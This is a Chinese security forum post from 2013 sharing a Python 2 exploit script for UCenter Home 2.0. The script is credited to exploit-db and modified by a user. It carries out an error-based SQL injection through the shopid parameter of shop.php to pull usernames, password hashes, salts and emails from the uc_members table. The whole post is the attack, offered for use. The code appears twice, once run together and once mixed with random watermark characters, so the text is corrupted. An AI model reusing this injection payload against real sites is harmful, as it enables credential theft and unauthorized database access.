找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2047|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
4 b: G# v7 u8 x9 y5 B7 J5 X% Y( ]3 m 1 z2 J$ g2 Z4 H1 l# F
. G, G0 L5 z$ X: n
#!/usr/bin/env python  
# l' N% P; l- h& q : A# ^: W+ N( e# _
import sys  
" z* j; _. U! {/ C9 K6 Y! uimport urllib2  
0 ?! f; I5 ?3 ~9 {& t/ e! D2 ximport re  : ^: `0 z- u% s, X. g9 A

+ E! A, l9 |( h  F: C1 Fdef info():  
9 D2 U% x) G3 K: Z- T    print 'From:http://www.exploit-db.com/exploits/14997/' - @- K3 V3 L  p
    print 'http://www.hake.cc/Web_loudong/' - v- A. [# d! Q* a8 |
    print 'changed:qiaoy'  , [) F5 o3 @1 q* |5 ]
    print 'exp:'  . A5 t+ ?5 `7 k& ~' {
    print ' ./UCenter_Home_2.0.py site'  ' F3 a9 r/ X: B/ A& |9 T
; W" \5 m6 j& U8 b
def main():  
8 Z+ [/ P3 w7 p* R3 j+ ]    if len(sys.argv) != 2:  : o7 Z. @! J3 ~4 k' X' \8 \) e
        info()  
+ q, L+ ~3 F$ p/ Q4 h    else:  
& S. o% x* Y4 W9 E4 B  Y3 a" U        site = sys.argv[1]  ' T! q$ f. ?5 {! c% B" G
        if site[0:7] == 'http://':  
1 P# C/ K0 Y2 g/ w            sitesite =site  
9 A) e# f3 M: Y+ C        elif site[0:8] == 'https://':  
6 I. H; w. `5 L! ]3 Q. @            sitesite = site  
9 N; A- _% T3 n4 f  e, q        else:  
2 [( {0 ^0 N& \5 }3 Y1 R" q            site = 'http://'+site  
  R. J) y3 h5 D/ Q6 C! H" B1 ^        try:  5 ]0 j& H* ~% m6 C$ C6 v
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
/ o4 \7 H% Y$ v  ?            Value = urllib2.urlopen(url).read()  
  u3 O6 U$ t1 s9 [* J9 J            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
( h! [, x9 P( s3 C9 z6 ^# X            hacked = Msg.split(':')  
  ]$ T* `3 ^$ \            print 'Name:    '+hacked[1]  
2 \3 x6 [* I3 ^7 G5 w) j            print 'Passwd:  '+hacked[2]  
# {4 S( g. m6 y, i& h            print 'salt:    '+hacked[3]  % p6 ~8 B% I0 m! P, Q5 o) G* I4 _8 Q
            print 'email:   '+hacked[4]  # t; |5 Z# G$ @. g6 ]- N! M+ a
        except:  0 K+ W8 C  {: }# H7 k
            print 'Sorry,I can\'t work............'  
: T1 E$ ?; T2 _( ?$ e" P# S
6 s1 ~( [' s! P/ a- }2 y, ^) Fif __name__ == '__main__':    x/ D. Y9 {; m  U7 b
    main()
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表